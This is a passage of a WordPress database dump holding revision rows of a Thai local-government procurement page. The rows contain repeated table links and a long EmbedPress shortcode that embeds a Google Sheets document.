_background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]','Elementor #1558','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:20:12','2025-07-01 07:20:12','',1558,'http://pakhaeng.ssk.in.th/?p=1562',0,'revision','',0),
(1564,1,'2025-07-01 14:24:02','2025-07-01 07:24:02','<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<p>[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' height=\'700\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854[/embedpress]</p>','รานการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ.2568','','inherit','closed','closed','','1558-revision-v1','','','2025-07-01 14:24:02','2025-07-01 07:24:02','',1558,'http://pakhaeng.ssk.in.th/?p=1564',0,'revision','',0),
(1565,1,'2025-07-01 14:27:44','2025-07-01 07:27:44','<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<p>[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp/edit?gid=1698444854#gid=1698444854\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' 